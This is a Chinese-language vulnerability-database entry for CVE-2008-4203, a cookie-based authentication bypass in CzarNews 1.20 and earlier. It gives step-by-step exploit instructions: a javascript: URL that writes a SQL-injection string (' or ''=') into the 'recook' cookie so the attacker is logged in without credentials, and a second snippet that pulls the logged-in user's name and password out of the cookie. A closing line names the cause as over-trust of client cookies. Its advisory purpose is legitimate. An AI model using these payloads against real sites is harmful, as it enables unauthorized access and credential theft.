CzarNews <= 1.20 (Cookie) Remote... CVE-2008-4203 CNNVD-200809-349

7.5 AV AC AU C I A
发布: 2008-09-24
修订: 2017-09-29

1. 首先登陆一个CzarNews 1.20 版本的网站。 2. 打开登陆页面,然后在地址栏中输入 ``` javascript:document.cookie="recook=' or ''=',' or ''='";void(0); ``` 随后刷新页面,接下来见证奇迹,你会惊奇的发现你处于了登陆状态。 3. 如果你输入以下代码在URL当中 ``` javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); ``` 你会发现你获取了当前登陆用户的账号和密码。 漏洞原因:     网站开发者太过于相信cookie了,导致攻击者在客户端直接修改cookie可以达到伪造用户的目的,造成不可预测的后果。

0%
当前有4条漏洞利用/PoC
当前有5条受影响产品信息